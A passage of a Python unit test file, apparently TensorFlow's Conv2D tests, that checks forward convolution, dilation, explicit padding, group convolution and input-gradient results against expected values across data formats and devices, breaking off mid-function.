SAME, SAME, SAME, SAME, VALID, VALID, VALID
]
for i, f, o, s, p in zip(input_sizes, filter_sizes, out_sizes, strides,
paddings):
yield i, f, o, s, p
def GetTestConfigs():
"""Get all the valid tests configs to run.
Returns:
all the valid test configs as tuples of data_format and use_gpu.
"""
test_configs = [("NHWC", False), ("NHWC", True)]
if test.is_gpu_available(cuda_only=True):
# "NCHW" format is only supported on CUDA.
test_configs += [("NCHW", True)]
return test_configs
class Conv2DTest(test.TestCase):
def _DtypesToTest(self, use_gpu):
# double datatype is currently not supported for convolution ops
# on the ROCm platform
optional_float64 = [] if test.is_built_with_rocm() else [dtypes.float64]
if use_gpu and not test_util.GpuSupportsHalfMatMulAndConv():
return [dtypes.float32] + optional_float64
else:
# It is important that float32 comes before float16 here,
# as we will be using its gradients as reference for fp16 gradients.
return [dtypes.float32, dtypes.float16] + optional_float64
def _CreateNumpyTensor(self, shape):
total_size = 1
for s in shape:
total_size *= s
return np.arange(1, total_size + 1, dtype=np.float32).reshape(shape)
def _SetupValuesForDevice(self, tensor_in_sizes, filter_in_sizes, dilations,
strides, padding, data_format, dtype, use_gpu):
"""Verifies the output values of the convolution function.
Args:
tensor_in_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_in_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
dilations: Dilated rate: [col_dilation, row_dilation]
strides: Stride: [col_stride, row_stride]
padding: Padding type.
data_format: Format of the data tensors.
dtype: Data type for inputs and outputs.
use_gpu: True if the operations should be run on GPU
Returns:
Symbolic tensor value that can be used to execute the computation
"""
x1 = self._CreateNumpyTensor(tensor_in_sizes)
x2 = self._CreateNumpyTensor(filter_in_sizes)
with test_util.device(use_gpu):
t1 = constant_op.constant(x1, shape=tensor_in_sizes, dtype=dtype)
t2 = constant_op.constant(x2, shape=filter_in_sizes, dtype=dtype)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if isinstance(padding, (list, tuple)):
padding = [(0, 0)] + padding + [(0, 0)]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
if isinstance(padding, (list, tuple)):
padding = test_util.NHWCToNCHW(padding)
conv = nn_ops.conv2d(
t1,
t2,
dilations=dilations,
strides=strides,
padding=padding,
data_format=data_format)
self.assertEqual(conv.dtype, dtype)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
return conv
def _CompareFwdValues(self, tensor_in_sizes, filter_in_sizes, conv_strides,
padding):
"""Verifies that CPU and GPU produce the same values.
Args:
tensor_in_sizes: Input tensor dimensions in
[batch, input_rows, input_cols, input_depth].
filter_in_sizes: Filter tensor dimensions in
[kernel_rows, kernel_cols, input_depth, output_depth].
conv_strides: [row_stride, col_stride] for the convolution;
padding: Padding type.
"""
x1 = np.random.rand(*tensor_in_sizes).astype(np.float32)
x2 = np.random.rand(*filter_in_sizes).astype(np.float32)
def _SetupVal(data_format, use_gpu):
with test_util.device(use_gpu):
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
strides = [1] + conv_strides + [1]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
strides = test_util.NHWCToNCHW(strides)
conv = nn_ops.conv2d(
t1, t2, strides=strides, padding=padding, data_format=data_format)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
return conv
tensors = []
for (data_format, use_gpu) in GetTestConfigs():
tensors.append(_SetupVal(data_format, use_gpu))
values = self.evaluate(tensors)
for i in range(1, len(values)):
self.assertAllClose(values[0], values[i], rtol=1e-3, atol=1e-3)
def _ComputeReferenceDilatedConv(self, tensor_in_sizes, filter_in_sizes,
stride, dilation, padding, data_format,
use_gpu):
x1 = self._CreateNumpyTensor(tensor_in_sizes)
x2 = self._CreateNumpyTensor(filter_in_sizes)
with test_util.device(use_gpu):
t1 = constant_op.constant(x1, shape=tensor_in_sizes)
t2 = constant_op.constant(x2, shape=filter_in_sizes)
if isinstance(stride, collections_abc.Iterable):
strides = list(stride)
else:
strides = [stride, stride]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
full_strides = [1, 1] + strides
full_dilation = [1, 1] + dilation
else:
full_strides = [1] + strides + [1]
full_dilation = [1] + dilation + [1]
expected = nn_ops.convolution(
t1,
t2,
padding=padding,
strides=strides,
dilation_rate=dilation,
data_format=data_format)
computed = nn_ops.conv2d(
t1,
t2,
strides=full_strides,
dilations=full_dilation,
padding=padding,
data_format=data_format)
if data_format == "NCHW":
expected = test_util.NCHWToNHWC(expected)
computed = test_util.NCHWToNHWC(computed)
return expected, computed
def _VerifyDilatedConvValues(self, tensor_in_sizes, filter_in_sizes, strides,
padding, dilations, rtol=1e-4):
expected_results = []
computed_results = []
for data_format, use_gpu in GetTestConfigs():
expected, computed = self._ComputeReferenceDilatedConv(
tensor_in_sizes, filter_in_sizes, strides, dilations, padding,
data_format, use_gpu)
expected_results.append(expected)
computed_results.append(computed)
tolerance = 1e-2 if use_gpu else 1e-5
expected_values = self.evaluate(expected_results)
computed_values = self.evaluate(computed_results)
for e_value, c_value in zip(expected_values, computed_values):
tf_logging.debug("expected = %s", e_value)
tf_logging.debug("actual = %s", c_value)
self.assertAllClose(
e_value.flatten(), c_value.flatten(), atol=tolerance, rtol=rtol)
def _VerifyValues(self,
tensor_in_sizes,
filter_in_sizes,
strides,
padding,
expected,
dilations=(1, 1),
gpu_only=False,
test_grappler_layout_optimizer=False,
tol=1e-5,
fp16_tol=1e-3):
if gpu_only and not test.is_gpu_available(cuda_only=True):
return
tensors = []
dilations = list(dilations)
for (data_format, use_gpu) in GetTestConfigs():
if gpu_only and not use_gpu:
continue
dtypes_to_test = self._DtypesToTest(use_gpu)
if not test_grappler_layout_optimizer and data_format == "NHWC":
dtypes_to_test.append(dtypes.int32)
for dtype in dtypes_to_test:
result = self._SetupValuesForDevice(
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
dtype,
use_gpu=use_gpu)
if test_grappler_layout_optimizer and data_format == "NHWC" and use_gpu:
# Grappler's layout optimizer will not optimize a fetch node, so
# this identity allows Grappler to optimize the Conv2D node.
result = array_ops.identity(result)
tensors.append(result)
values = self.evaluate(tensors)
for i in range(len(tensors)):
conv = tensors[i]
value = values[i]
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
tol_to_use = fp16_tol if value.dtype == np.float16 else tol
if np.issubdtype(value.dtype, np.integer):
self.assertAllEqual(np.rint(expected), np.ravel(value))
else:
self.assertAllClose(expected, np.ravel(value), atol=tol_to_use,
rtol=tol_to_use)
self.assertShapeEqual(value, conv)
self.assertEqual(value.dtype, conv.dtype.as_numpy_dtype)
def _VerifyExplicitPaddings(self,
tensor_in_sizes,
filter_in_sizes,
strides,
padding,
dilations=(1, 1),
test_grappler_layout_optimizer=False,
tol=1e-5,
fp16_tol=1e-3):
"""Verifies Conv2D with explicit padding generates correct values.
It does this by comparing with Conv2D without explicit padding. This
function assumes Conv2D without explicit padding works correctly.
Args:
tensor_in_sizes: Input tensor dimensions in [batch, input_rows,
input_cols, input_depth].
filter_in_sizes: Filter tensor dimensions in [kernel_rows, kernel_cols,
input_depth, output_depth].
strides: [row_stride, col_stride] for the convolution;
padding: Explicit padding amounts.
dilations: Dilation values
test_grappler_layout_optimizer: If True, allow the Grappler layout
optimizer to run, which turns NHWC Conv2Ds on the GPU to NCHW Conv2Ds.
tol: The absolute and relative tolerance for non-fp16 dtypes.
fp16_tol: The absolute and relative tolerance for fp16.
"""
input_tensor = self._CreateNumpyTensor(tensor_in_sizes)
filter_tensor = self._CreateNumpyTensor(filter_in_sizes)
input_tensor = array_ops.pad(input_tensor, [(0, 0)] + padding + [(0, 0)])
dilations = list(dilations)
conv2d_result = nn_ops.conv2d(
input_tensor,
filter_tensor, [1] + list(strides) + [1],
"VALID",
dilations=[1] + dilations + [1])
expected = list(self.evaluate(array_ops.reshape(conv2d_result, [-1])))
self._VerifyValues(
tensor_in_sizes,
filter_in_sizes,
strides,
padding,
expected,
dilations,
test_grappler_layout_optimizer=test_grappler_layout_optimizer,
tol=tol,
fp16_tol=fp16_tol)
@test_util.run_in_graph_and_eager_modes
def testConv2D1x1Filter(self):
expected_output = [
30.0, 36.0, 42.0, 66.0, 81.0, 96.0, 102.0, 126.0, 150.0, 138.0, 171.0,
204.0, 174.0, 216.0, 258.0, 210.0, 261.0, 312.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
conv1 = nn_ops.conv2d(
x1,
filter_in,
strides=[1, 1],
padding="VALID")
conv2 = nn_ops.conv2d(
x2,
filter_in,
strides=[1, 1],
padding="VALID")
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConvolutionClass2DExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
convolver1 = nn_ops.Convolution(
input_shape=x1.shape,
filter_shape=filter_in.shape,
strides=[1, 1],
padding="VALID")
self.assertEqual(convolver1.num_batch_dims, 1)
convolver2 = nn_ops.Convolution(
input_shape=x2.shape,
filter_shape=filter_in.shape,
strides=[1, 1],
padding="VALID")
self.assertEqual(convolver2.num_batch_dims, 2)
conv1 = convolver1(x1, filter_in)
conv2 = convolver2(x2, filter_in)
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConvolutionWith2SpatialDimensionsAndExpandedBatch(self):
tensor_in_sizes_batch = [10, 2, 3, 3]
tensor_in_sizes_expanded_batch = [2, 5, 2, 3, 3]
filter_in_sizes = [1, 1, 3, 3]
filter_in = self._CreateNumpyTensor(filter_in_sizes)
x1 = self._CreateNumpyTensor(tensor_in_sizes_batch)
x2 = x1.reshape(tensor_in_sizes_expanded_batch)
conv1 = nn_ops.convolution(
x1,
filter_in,
strides=[1, 1],
padding="VALID")
conv2 = nn_ops.convolution(
x2,
filter_in,
strides=[1, 1],
padding="VALID")
self.assertEqual(conv1.shape, tensor_in_sizes_batch)
self.assertEqual(conv2.shape, tensor_in_sizes_expanded_batch)
self.assertAllEqual(
conv1,
self.evaluate(conv2).reshape(conv1.shape))
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Filter2x1Dilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2DEmpty(self):
expected_output = []
self._VerifyValues(
tensor_in_sizes=[0, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[0, 2, 3, 3],
filter_in_sizes=[1, 1, 3, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Filter(self):
# The outputs are computed using third_party/py/IPython/notebook.
expected_output = [2271.0, 2367.0, 2463.0, 2901.0, 3033.0, 3165.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
dilations=[1, 2],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D1x2Filter(self):
# The outputs are computed using third_party/py/IPython/notebook.
expected_output = [
231.0, 252.0, 273.0, 384.0, 423.0, 462.0, 690.0, 765.0, 840.0, 843.0,
936.0, 1029.0
]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D1x2FilterDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[1, 2, 3, 3],
strides=[1, 1],
dilations=[2, 1],
padding="VALID")
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride2(self):
expected_output = [2271.0, 2367.0, 2463.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[2, 2],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride2Same(self):
expected_output = [2271.0, 2367.0, 2463.0, 1230.0, 1305.0, 1380.0]
self._VerifyValues(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[2, 2],
padding="SAME",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2FilterStride1x2(self):
expected_output = [58.0, 78.0, 98.0, 118.0, 138.0, 158.0]
self._VerifyValues(
tensor_in_sizes=[1, 3, 6, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[1, 2],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSmallerThanStrideValid(self):
expected_output = [65, 95, 275, 305]
self._VerifyValues(
tensor_in_sizes=[1, 7, 7, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[3, 3],
padding="VALID",
expected=expected_output)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSmallerThanStrideSame(self):
self._VerifyValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 7, 9])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[1, 1, 1, 1],
strides=[2, 2],
padding="SAME",
expected=[1, 3, 9, 11])
self._VerifyValues(
tensor_in_sizes=[1, 4, 4, 1],
filter_in_sizes=[2, 2, 1, 1],
strides=[3, 3],
padding="SAME",
expected=[44, 28, 41, 16])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSize(self):
self._VerifyValues(
tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
padding="VALID",
expected=[50, 60])
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeDilation(self):
self._VerifyDilatedConvValues(
tensor_in_sizes=[1, 3, 3, 1],
filter_in_sizes=[2, 2, 1, 2],
strides=[1, 1],
dilations=[2, 2],
padding="VALID")
@test_util.run_in_graph_and_eager_modes()
def testConv2D0x0Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[0, 0], [0, 0]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[3, 4, 3, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 2],
padding=[[0, 0], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D1x1Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 2, 1],
filter_in_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding=[[1, 1], [1, 1]])
@test_util.run_in_graph_and_eager_modes()
def testConv2D2x2Padding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[2, 1, 2, 1],
strides=[1, 1],
padding=[[2, 2], [2, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 2],
filter_in_sizes=[1, 1, 2, 1],
strides=[2, 1],
padding=[[2, 2], [2, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyBottomPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[0, 3], [0, 0]], tol=2e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[2, 2, 4, 3],
filter_in_sizes=[1, 2, 3, 2],
strides=[2, 2],
padding=[[0, 3], [0, 0]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DOnlyTopRightPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 3],
filter_in_sizes=[2, 2, 3, 2],
strides=[1, 1],
padding=[[1, 0], [0, 2]],
tol=5e-5)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 4, 2],
filter_in_sizes=[2, 2, 2, 2],
strides=[1, 3],
padding=[[1, 0], [0, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DLotsPadding(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 1, 1, 3],
filter_in_sizes=[2, 2, 3, 3],
strides=[1, 1],
padding=[[3, 4], [4, 2]])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 1, 1],
filter_in_sizes=[2, 2, 1, 3],
strides=[2, 1],
padding=[[3, 4], [4, 2]])
@test_util.run_in_graph_and_eager_modes()
def testConv2DExplicitPaddingWithDilations(self):
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1])
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3])
def testConv2DExplicitPaddingWithLayoutOptimizer(self):
# Test with Grappler's layout optimizer, to ensure the layout optimizer
# handles explicit padding correctly.
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 3, 2, 1],
filter_in_sizes=[1, 2, 1, 2],
strides=[1, 1],
padding=[[1, 0], [0, 1]],
dilations=[2, 1],
test_grappler_layout_optimizer=True)
self._VerifyExplicitPaddings(
tensor_in_sizes=[1, 2, 3, 2],
filter_in_sizes=[3, 2, 2, 1],
strides=[1, 1],
padding=[[2, 1], [1, 2]],
dilations=[2, 3],
test_grappler_layout_optimizer=True)
def _VerifyGroupConvFwd(self, tensor_in_sizes, filter_in_sizes, dilations,
strides, padding, data_format, dtype):
"""Verify the output of group convolution is equal to a for-loop implementation.
Args:
tensor_in_sizes: Input tensor dimensions in [batch, input_rows,
input_cols, input_depth].
filter_in_sizes: Filter tensor dimensions in [kernel_rows, kernel_cols,
input_depth, output_depth].
dilations: Dilated rate: [col_dilation, row_dilation]
strides: Stride: [col_stride, row_stride]
padding: Padding type.
data_format: Format of the data tensors.
dtype: Data type for inputs and outputs.
"""
tensor_in = self._CreateNumpyTensor(tensor_in_sizes)
filter_in = self._CreateNumpyTensor(filter_in_sizes)
num_groups = tensor_in_sizes[3] // filter_in_sizes[2]
assert num_groups > 1 and \
filter_in_sizes[2] * num_groups == tensor_in_sizes[3]
with test_util.device(True):
t1 = constant_op.constant(tensor_in, dtype=dtype)
t2 = constant_op.constant(filter_in, dtype=dtype)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if data_format == "NCHW":
t1 = test_util.NHWCToNCHW(t1)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
t1_splits = array_ops.split(t1, num_groups, axis=1)
else:
t1_splits = array_ops.split(t1, num_groups, axis=3)
t2_splits = array_ops.split(t2, num_groups, axis=3)
def MakeConv2d(inputs, filters):
return nn_ops.conv2d(
inputs,
filters,
strides,
padding,
dilations=dilations,
data_format=data_format)
group_conv = MakeConv2d(t1, t2)
group_conv_loop = array_ops.concat(
[MakeConv2d(t1s, t2s) for t1s, t2s in zip(t1_splits, t2_splits)],
axis=1 if data_format == "NCHW" else 3)
results = self.evaluate([group_conv, group_conv_loop])
tol_to_use = 1e-5
self.assertAllClose(
results[0], results[1], atol=tol_to_use, rtol=tol_to_use)
@test_util.run_in_graph_and_eager_modes
@test_util.run_cuda_only
def testConv2DGroupConvFwd(self):
for data_format in ["NHWC", "NCHW"]:
for dilation in [1, 2]:
for stride in [1, 2]:
self._VerifyGroupConvFwd([10, 32, 32, 16], [3, 3, 4, 8],
dilations=[dilation, dilation],
strides=[stride, stride],
padding="SAME",
data_format=data_format,
dtype=dtypes.float32)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testInputGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
@test_util.deprecated_graph_mode_only
@test_util.run_cuda_only
def testFilterGradientGroupConv(self):
for data_format in ["NCHW", "NHWC"]:
for test_input in [True, False]:
self.ConstructAndTestGradient(
batch=2,
input_rows=5,
input_cols=4,
filter_rows=3,
filter_cols=3,
num_groups=2,
padding="VALID",
in_depth=4,
out_depth=6,
stride_rows=1,
stride_cols=1,
test_input=test_input,
data_format=data_format,
use_gpu=True,
max_err=0.005)
# TODO(yzhwang): this currently fails.
# self._VerifyValues(tensor_in_sizes=[1, 8, 8, 1],
# filter_in_sizes=[2, 2, 1, 1],
# strides=[4, 4], padding="SAME",
# expected=[72, 112, 392, 432])
# Testing for backprops
def _RunAndVerifyBackpropInput(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu,
err,
dilations=(1, 1)):
if use_gpu and not test.is_gpu_available(cuda_only=True):
return
x1 = self._CreateNumpyTensor(filter_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
with test_util.device(use_gpu):
if len(input_sizes) == 4:
if data_format == "NCHW":
input_sizes = test_util.NHWCToNCHW(input_sizes)
t0 = constant_op.constant(input_sizes, shape=[len(input_sizes)])
t1 = constant_op.constant(x1, shape=filter_sizes)
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
if isinstance(padding, (list, tuple)):
padding = [(0, 0)] + padding + [(0, 0)]
if data_format == "NCHW":
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
dilations = test_util.NHWCToNCHW(dilations)
if isinstance(padding, (list, tuple)):
padding = test_util.NHWCToNCHW((padding))
conv = nn_ops.conv2d_backprop_input(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format,
dilations=dilations)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
# "values" consists of two tensors for two backprops
value = self.evaluate(conv)
self.assertShapeEqual(value, conv)
tf_logging.debug("expected = %s", expected)
tf_logging.debug("actual = %s", value)
self.assertAllCloseAccordingToType(expected, value.flatten(), atol=1e-5)
def _CompareBackpropInput(self, input_sizes, filter_sizes, output_sizes,
conv_strides, padding):
x1 = np.random.rand(*filter_sizes).astype(np.float32)
x2 = np.random.rand(*output_sizes).astype(np.float32)
def _GetVal(data_format, use_gpu):
with test_util.device(use_gpu):
if data_format == "NCHW":
new_input_sizes = test_util.NHWCToNCHW(input_sizes)
else:
new_input_sizes = input_sizes
t0 = constant_op.constant(new_input_sizes, shape=[len(new_input_sizes)])
t1 = constant_op.constant(x1, shape=filter_sizes)
t2 = constant_op.constant(x2, shape=output_sizes)
strides = [1] + conv_strides + [1]
if data_format == "NCHW":
t2 = test_util.NHWCToNCHW(t2)
strides = test_util.NHWCToNCHW(strides)
conv = nn_ops.conv2d_backprop_input(
t0,
t1,
t2,
strides=strides,
padding=padding,
data_format=data_format)
if data_format == "NCHW":
conv = test_util.NCHWToNHWC(conv)
ret = self.evaluate(conv)
self.assertShapeEqual(ret, conv)
return ret
values = []
for (data_format, use_gpu) in GetTestConfigs():
values.append(_GetVal(data_format, use_gpu))
for i in range(1, len(values)):
self.assertAllClose(values[0], values[i], rtol=1e-2, atol=1e-2)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth1ValidBackpropInput(self):
expected_output = [1.0, 4.0, 4.0, 3.0, 10.0, 8.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DEmptyBackpropInput(self):
expected_output = []
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[0, 2, 3, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[0, 1, 2, 1],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInput(self):
expected_output = [
14.0, 32.0, 50.0, 100.0, 163.0, 226.0, 167.0, 212.0, 257.0, 122.0,
140.0, 158.0, 478.0, 541.0, 604.0, 437.0, 482.0, 527.0
]
for (data_format, use_gpu) in GetTestConfigs():
# The GPU version of this test is not very stable. So adjusting the
# error threshold to 1e-4.
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 3, 3],
filter_sizes=[2, 2, 3, 3],
output_sizes=[1, 1, 2, 3],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-4)
@test_util.run_in_graph_and_eager_modes
def testConv2D2x2Depth3ValidBackpropInputStride1x2(self):
expected_output = [
1.0, 2.0, 2.0, 4.0, 3.0, 6.0, 7.0, 12.0, 11.0, 18.0, 15.0, 24.0, 12.0,
16.0, 15.0, 20.0, 18.0, 24.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 3, 6, 1],
filter_sizes=[2, 2, 1, 1],
output_sizes=[1, 2, 3, 1],
strides=[1, 2],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DStrideTwoFilterOneSameBackpropInput(self):
expected_output = [
1.0, 0.0, 2.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.0, 0.0, 4.0, 0.0, 0.0, 0.0,
0.0, 0.0
]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 4, 4, 1],
filter_sizes=[1, 1, 1, 1],
output_sizes=[1, 2, 2, 1],
strides=[2, 2],
padding="SAME",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
def testConv2DKernelSizeMatchesInputSizeBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[1, 2, 2, 1],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
@test_util.run_in_graph_and_eager_modes
@test_util.disable_xla("XLA requires input_sizes to be a 4D shape.")
def testConv2DInputSizesContainsOnlySpatialDimensionsBackpropInput(self):
expected_output = [5.0, 11.0, 17.0, 23.0]
for (data_format, use_gpu) in GetTestConfigs():
self._RunAndVerifyBackpropInput(
input_sizes=[2, 2],
filter_sizes=[2, 2, 1, 2],
output_sizes=[1, 1, 1, 2],
strides=[1, 1],
padding="VALID",
expected=expected_output,
data_format=data_format,
use_gpu=use_gpu,
err=1e-5)
# Testing for backprops
def _RunAndVerifyBackpropFilter(self,
input_sizes,
filter_sizes,
output_sizes,
strides,
padding,
expected,
data_format,
use_gpu,
dilations=(1, 1),
err=1e-5):
x0 = self._CreateNumpyTensor(input_sizes)
x2 = self._CreateNumpyTensor(output_sizes)
dilations = list(dilations)
explicit_strides = [1] + strides + [1]
new_padding = padding
new_dilations = [1] + dilations + [1]
if isinstance(new_padding, (list, tuple)):
new_padding = [(0, 0)] + new_padding + [(0, 0)]
if data_format == "NCHW":
explicit_strides = test_util.NHWCToNCHW(explicit_strides)
new_dilations = test_util.NHWCToNCHW(new_dilations)
if isinstance(padding, (list, tuple)):
new_padding = test_util.NHWCToNCHW(new_padding)
for dtype in self._DtypesToTest(use_gpu=use_gpu):
